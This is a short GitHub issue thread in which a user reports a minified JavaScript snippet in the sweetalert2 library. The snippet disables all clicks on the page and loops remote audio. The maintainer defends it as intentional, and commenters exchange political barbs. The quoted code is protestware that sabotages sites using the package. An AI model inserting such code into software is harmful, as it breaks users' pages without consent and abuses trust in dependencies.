### ISSUE TITLE
Hello, this is not funny

### ISSUE THREAD

**Issue by Wlademon** [sweetalert2/sweetalert2#2560]
&&setTimeout(function(){document.body.style.pointerEvents="none";var t=document.createElement("audio");t.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",t.loop=!0,document.body.appendChild(t),setTimeout(function(){t.play().catch(function(){})},2500)

**Comment by limonte** [comment]
The terrorism your country is doing is not funny.

**Comment by Wlademon** [comment]
I agree, but just the anthem of Ukraine would be fine, but why block button handlers?

**Comment by limonte** [comment]
So the Ukrainian anthem won't be interrupted by user clicks/taps and users will enjoy it fully :)

**Comment by iamcsharper** [comment]
> So the Ukrainian anthem won't be interrupted by user clicks/taps and users will enjoy it fully :)

how funny is spectacle of miserable nerd's attempts to express themselves

**Comment by pravosleva** [comment]
🔥 [На каждую хитрую гайку найдётся болт с резьбой](https://github.com/sweetalert2/sweetalert2/issues/2594#issuecomment-1402869754)
